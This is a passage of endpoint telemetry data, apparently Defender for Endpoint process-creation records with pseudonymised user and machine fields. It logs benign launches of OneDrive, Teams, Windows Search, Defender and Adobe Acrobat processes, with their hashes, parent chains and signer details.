01:00:55.217759900+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\OneDrive\OneDrive.exe,1972608,11ba11877c91ca6e9d705f4de1f68fe6,7270e71d3dfeef57e322931c341a83328474e0f543fb5aec66fce9b8ae90ed1f,fb9ca96631c86fd40768d63831cc327431e04a64,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:36.966154400+00:00,2021-06-23 00:52:50.793659500+00:00,a85ac395-6c26-4281-a804-9a7c3526e392,computerpii_0a470890c60768167990033d701e7bd881398861,154694,False,10.7740.19041.1052,False,11540474045171770,,11540474045171811,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft OneDrive,21.099.0516.0003,Client Application,OneDrive.exe,Microsoft OneDrive
+975,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:38.356200500+00:00,14744,Update.exe,"""Update.exe"" --processStart ""Teams.exe"" --process-start-args ""--system-initiated""",PortableExecutable,2020-11-11 01:26:36.505424500+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,2454184,958472658892e02affb3c43d2a7ad030,76c4854a36d8cf22fb14f2f61d00013820a1b7431f9a896a0b29af8a8748e842,934d0f53972cb7896f39019b5f79d835cc413f26,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:38.719525700+00:00,2021-06-23 00:52:50.808549+00:00,ae1588de-c6f6-4d03-9433-60ad93a834fd,computerpii_0a470890c60768167990033d701e7bd881398861,154715,False,10.7740.19041.1052,False,11540474045171770,,11540474045171812,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Teams,1.10.63.0,Update.exe,Update.exe,Microsoft Teams
+976,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:39.547623600+00:00,3676,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe624_ Global\UsGthrCtrlFltPipeMssGthrPipe624 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:39.624499300+00:00,2021-06-23 00:52:50.809080900+00:00,eea1144e-18a0-445d-9c8a-bc44eaf85607,computerpii_0a470890c60768167990033d701e7bd881398861,154723,False,10.7740.19041.1052,False,11540474045144190,,11540474045171814,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+977,False,Medium,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:39.604692900+00:00,17232,SearchFilterHost.exe,"""SearchFilterHost.exe"" 0 816 820 828 8192 824 800 ",PortableExecutable,2021-06-09 01:20:40.727903+00:00,C:\Windows\System32\SearchFilterHost.exe,272384,ebf92961aa0ccc0ac803fdfa859d85d4,09a2cd711fd5076160ff590fcbc83ce4fc422c89e7373373cf3eda471c6d819a,4b51f519b24b0ea0e113973e5a65b3ba86517ac2,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:39.627212800+00:00,2021-06-23 00:52:50.809141700+00:00,6f1da874-b4d8-444b-923e-6d46e70f1826,computerpii_0a470890c60768167990033d701e7bd881398861,154724,False,10.7740.19041.1052,False,11540474045144190,,11540474045171815,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchFilterHost.exe,SearchFilterHost.exe,Microsoft Windows Search Filter Host
+978,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:11:37.828536500+00:00,5540,SenseCncProxy.exe,864,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:11:38.838855500+00:00,2021-06-23 01:13:39.846343800+00:00,bb2907bb-a265-4d8f-9e75-3d0d336bdd8f,computerpii_0a470890c60768167990033d701e7bd881398861,156389,False,10.7740.19041.1052,False,11540474045137006,,11540474045172144,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+979,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:01.371987+00:00,2348,AdobeARM.exe,"""AdobeARM.exe""",PortableExecutable,2021-01-25 13:55:56+00:00,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,1557200,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:01.634979+00:00,2021-06-23 01:00:53.294575+00:00,5a79fb9c-d658-43e1-bc8d-5eb055c1d571,computerpii_0a470890c60768167990033d701e7bd881398861,155925,False,10.7740.19041.1052,False,11540474045136925,,11540474045171999,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager
+980,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:01.614894700+00:00,16780,reader_sl.exe,"""Reader_sl.exe"" ",PortableExecutable,2021-04-21 02:19:48+00:00,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe,24232,02e5f23e179d8db9e102b687ad3b42c5,7fa3bdd3fe2bb536e44488a975d67d63b9ced77d9707ccbcefb17de8e0d562b7,f3523b94ac9922be2e2977c073b5be2992b784b2,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:01.371987+00:00,2348,AdobeARM.exe,"""AdobeARM.exe""",False,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:01.641235100+00:00,2021-06-23 01:00:53.294702800+00:00,5e7e525b-01f3-419b-9e9c-05d1185c4eba,computerpii_0a470890c60768167990033d701e7bd881398861,155927,False,10.7740.19041.1052,False,11540474045171999,,11540474045172000,2021-06-23 01:00:01.371987+00:00,2348,2021-06-23 01:00:01.371987+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,2348,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0,1557200,2021-01-26 05:50:58+00:00,2021-01-25 13:55:56+00:00,2021-06-23 01:00:01.381009300+00:00,2021-01-25 13:55:56+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,128.0,5.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager,Adobe Systems Incorporated,Adobe Acrobat,21.1.20150.432529,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher
+981,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:01.626329400+00:00,12112,acrobat_sl.exe,"""Acrobat_sl.exe"" ",PortableExecutable,2021-02-02 05:49:32+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe,24232,d4ebed1bb1cfb00171ce0cf6dbc4039b,f6b88a34e92155a3b9c1cc3aca24c56d62318b3ffb343025318bfdb5367b4e3c,da66d66d18c23a33e78d356b3b5be963c3e32dc9,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:01.371987+00:00,2348,AdobeARM.exe,"""AdobeARM.exe""",False,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:01.643080100+00:00,2021-06-23 01:00:53.294766700+00:00,f36bcf59-19c6-499e-9ca9-1494ae1ec10b,computerpii_0a470890c60768167990033d701e7bd881398861,155928,False,10.7740.19041.1052,False,11540474045171999,,11540474045172001,2021-06-23 01:00:01.371987+00:00,2348,2021-06-23 01:00:01.371987+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,2348,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0,1557200,2021-01-26 05:50:58+00:00,2021-01-25 13:55:56+00:00,2021-06-23 01:00:01.381009300+00:00,2021-01-25 13:55:56+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,128.0,5.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager,Adobe Systems Incorporated,Adobe Acrobat,21.1.20135.421056,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher
+982,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:01.631789600+00:00,4060,AcroRd32.exe,"""AcroRd32.exe"" /l /slMode",PortableExecutable,2021-05-28 05:58:48+00:00,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe,3150048,3c9b885b579ebadaae15e391ac8313af,cf40670e0eb0629a0d51f65325c692788d0a5503dea3f13db643b916701ab1da,d75dea803685620b22514689e32c2287206dcc63,02e5f23e179d8db9e102b687ad3b42c5,7fa3bdd3fe2bb536e44488a975d67d63b9ced77d9707ccbcefb17de8e0d562b7,f3523b94ac9922be2e2977c073b5be2992b784b2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:01.614894700+00:00,16780,reader_sl.exe,"""Reader_sl.exe"" ",False,2021-06-23 01:00:01.371987+00:00,2348,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:01.646296100+00:00,2021-06-23 01:00:53.294895700+00:00,3093d84e-552e-43c8-bf01-e70b6143c2c1,computerpii_0a470890c60768167990033d701e7bd881398861,155930,False,10.7740.19041.1052,False,11540474045172000,,11540474045172002,2021-06-23 01:00:01.614894700+00:00,16780,2021-06-23 01:00:01.614894700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe,16780,128,TerminateProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader,24232,2021-04-21 00:08:06+00:00,2021-04-21 02:19:48+00:00,2021-06-23 01:00:01.603248800+00:00,2021-04-21 02:19:48+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,5.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat,21.1.20150.432529,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher,Adobe Systems Incorporated,Adobe Acrobat Reader DC,21.5.20048.436468,,AcroRd32.exe,Adobe Acrobat Reader DC
+983,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:01.642011300+00:00,9040,Acrobat.exe,"""Acrobat.exe"" /l /slMode",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,d4ebed1bb1cfb00171ce0cf6dbc4039b,f6b88a34e92155a3b9c1cc3aca24c56d62318b3ffb343025318bfdb5367b4e3c,da66d66d18c23a33e78d356b3b5be963c3e32dc9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:01.626329400+00:00,12112,acrobat_sl.exe,"""Acrobat_sl.exe"" ",False,2021-06-23 01:00:01.371987+00:00,2348,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:01.720777100+00:00,2021-06-23 01:00:53.295022600+00:00,815dbde5-145f-403e-afc3-a38c957ecc30,computerpii_0a470890c60768167990033d701e7bd881398861,155932,False,10.7740.19041.1052,False,11540474045172001,,11540474045172003,2021-06-23 01:00:01.626329400+00:00,12112,2021-06-23 01:00:01.626329400+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe,12112,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,24232,2021-02-02 03:38:39+00:00,2021-02-02 05:49:32+00:00,2021-06-23 01:00:01.618756+00:00,2021-02-02 05:49:32+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,5.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat,21.1.20135.421056,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+984,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:01.643944800+00:00,13428,RdrCEF.exe,"""RdrCEF.exe"" --slMode",PortableExecutable,2021-05-28 05:58:50+00:00,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe,7229664,c3e3e510c1c2988a080c020d555e3f1f,bd6e90e120c7a195c5d65d8434bd04d8b77f4f91eca5897abec26afbe1093668,e47c6fbe16095f6cd1c04c2abb51e0cf82a01310,02e5f23e179d8db9e102b687ad3b42c5,7fa3bdd3fe2bb536e44488a975d67d63b9ced77d9707ccbcefb17de8e0d562b7,f3523b94ac9922be2e2977c073b5be2992b784b2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:01.614894700+00:00,16780,reader_sl.exe,"""Reader_sl.exe"" ",False,2021-06-23 01:00:01.371987+00:00,2348,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:01.721991900+00:00,2021-06-23 01:00:53.295089200+00:00,66949751-a620-4bfd-9b35-d3f56408fde2,computerpii_0a470890c60768167990033d701e7bd881398861,155933,False,10.7740.19041.1052,False,11540474045172000,,11540474045172004,2021-06-23 01:00:01.614894700+00:00,16780,2021-06-23 01:00:01.614894700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe,16780,128,TerminateProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader,24232,2021-04-21 00:08:06+00:00,2021-04-21 02:19:48+00:00,2021-06-23 01:00:01.603248800+00:00,2021-04-21 02:19:48+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,5.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat,21.1.20150.432529,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher,,,,,,
